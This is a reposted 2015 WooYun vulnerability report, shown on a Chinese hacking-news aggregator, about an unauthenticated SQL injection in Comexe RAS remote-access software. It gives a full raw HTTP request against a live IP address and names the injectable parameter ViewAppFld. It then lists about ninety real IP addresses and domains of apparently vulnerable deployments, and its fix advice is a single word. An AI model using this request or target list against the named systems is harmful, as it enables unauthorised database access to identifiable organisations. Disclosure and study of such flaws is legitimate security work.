记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

科迈RAS远程快速接入方案另一处SQL注入(无需登录DBA权限)

2015-10-08 17:55

WooYun: 科迈某客户端两处SQL注入影响大量系统(无需登录DBA权限) 与这个注入文件不同。



科迈RAS远程快速接入方案(远程快速应用接入)全版本都受影响的。

无需登录存在SQL注入。



code 区域
POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1

Content-Length: 118

Content-Type: application/x-www-form-urlencoded

Referer: http://183.230.42.251:81/

Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E

Host: 183.230.42.251:81

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1&ViewAppValue=1



参数ViewAppFld

漏洞证明:

aaaaaaaaaaaaaaa11111111111111111.jpg





aaaaaaaaaaaaaaa22222222222222222222.jpg





aaaaaaaaaaaaaaa33333333333333333.jpg





aaaaaaaaaaaa44444444444444444.jpg





aaaaaaaaaaaa555555555555555555.jpg





code 区域
http://220.172.105.41:81/CmxDownload.php

http://125.66.20.6/CmxDownload.php

http://183.230.42.251:81/CmxDownload.php

http://221.13.104.174:8888/CmxDownload.php

http://114.135.72.241:81/CmxDownload.php

http://61.189.189.43:81/CmxDownload.php

http://202.104.138.38/CmxDownload.php

http://222.242.198.90/CmxDownload.php

http://113.106.92.83:8080/cmxlogin.php?t=14345927739642

http://122.227.188.254/cmxlogin.php?t=14345719793756

http://60.191.119.162:8080/CmxDownload.php

http://oa.wishingfoods.com:8080/CmxDownload.php

http://61.164.136.94:81/CmxDownload.php

http://58.222.218.171:8888/CmxDownload.php

http://60.191.95.21:8080/CmxDownload.php

http://58.210.192.202:8888/cmxlogin.php?t=13547228176021

http://58.211.90.4:81/CmxDownload.php

http://222.34.131.4:81/CmxDownload.php

http://60.10.34.57:8888/CmxDownload.php

http://124.67.67.99:8080/CmxDownload.php

http://58.18.169.92/CmxDownload.php

http://218.21.213.182:8000/cmxlogin.php?t=14344257908105

http://116.113.105.106:8000/cmxlogin.php?t=14344255806630

http://61.134.119.52:8000/CmxDownload.php

http://116.113.111.29:8080/CmxDownload.php

http://202.99.241.40/CmxDownload.php

http://124.67.68.166:8000/CmxDownload.php

http://183.129.249.246:8002/CmxDownload.php

http://125.88.162.31:81/CmxDownload.php

http://58.210.33.231:8080/CmxDownload.php

http://61.163.182.87:8080/CmxDownload.php

http://60.191.26.174:81/cmxlogin.php?t=14343482319389

http://61.182.242.18:8080/CmxDownload.php

http://218.94.1.157:81/CmxDownload.php

http://27.223.11.34:8001/CmxDownload.php

http://218.21.213.182:8000/cmxlogin.php?t=14343020933433

http://223.72.237.39/CmxDownload.php

http://60.10.192.106:8080/CmxDownload.php

http://122.228.122.58/CmxDownload.php

http://116.113.105.106:8000/cmxlogin.php?t=14342616673483

http://122.224.109.230:8080/CmxDownload.php

http://122.224.231.67:81/CmxDownload.php

http://221.224.94.98/CmxDownload.php

http://113.16.255.224:8080/CmxDownload.php

http://222.185.234.100:8000/CmxDownload.php

http://222.168.51.166:8000/CmxDownload.php

http://222.222.156.19:81/cmxlogin.php?t=14342148006227

http://218.59.231.170:81/CmxDownload.php

http://121.33.210.52:8000/CmxDownload.php

http://mail.ydqx.cn/cmxlogin.php?t=14341807665134

http://222.46.21.186:8080/CmxDownload.php

http://ydqx.cn/cmxlogin.php?t=14341806064013

http://218.15.164.122/cmxlogin.php?t=14341805565006

http://58.246.192.162:8001/cmxlogin.php?t=14341775326147

http://61.164.94.186:8080/CmxDownload.php

http://221.12.36.150:8000/CmxDownload.php

http://erp.ap365.com:8088/CmxDownload.php

http://123.235.22.66:8080/CmxDownload.php

http://180.166.124.162:8080/CmxDownload.php

http://60.28.142.150:81/CmxDownload.php

http://116.228.68.38:8080/CmxDownload.php

http://180.166.136.3:81/CmxDownload.php

http://61.153.216.59:8080/CmxDownload.php

http://101.68.209.2:8080/cmxlogin.php?t=14339409675130

http://222.162.50.226:8080/CmxDownload.php

http://222.85.1.76:8000/CmxDownload.php

http://mail.zypcg.com/CmxDownload.php

http://60.208.78.51:8000/CmxDownload.php

http://116.113.111.29:8080/CmxDownload.php

http://218.25.170.4:8080/CmxDownload.php

http://122.226.152.126:8080/CmxDownload.php

http://218.65.37.93:8888/CmxDownload.php

http://115.238.142.206:8080/CmxDownload.php

http://58.211.149.138:81/CmxDownload.php

http://180.169.76.3:8080/cmxlogin.php?t=14338222676437

http://61.164.50.186:8080/CmxDownload.php

http://122.224.109.227:8080/CmxDownload.php

http://220.166.160.42/cmxlogin.php?t=14337336287380

http://221.8.32.20/CmxDownload.php

http://218.71.137.102/CmxDownload.php

http://218.26.238.82:8000/cmxlogin.php?t=14337068121870

http://61.154.11.185:8888/CmxDownload.php

http://122.140.95.39:8080/CmxDownload.php

http://223.255.20.80/CmxDownload.php

http://61.132.92.51:81/cmxlogin.php?t=14336851360738

http://125.32.43.190:8080/CmxDownload.php

http://122.224.204.250:8888/cmxlogin.php?t=14336609488901

http://111.43.129.102:8888/CmxDownload.php

http://219.159.111.190:8888/cmxlogin.php?t=14336562079134

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0124796

阅读:781767 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“科迈RAS远程快速接入方案另一处SQL注入(无需登录DBA权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云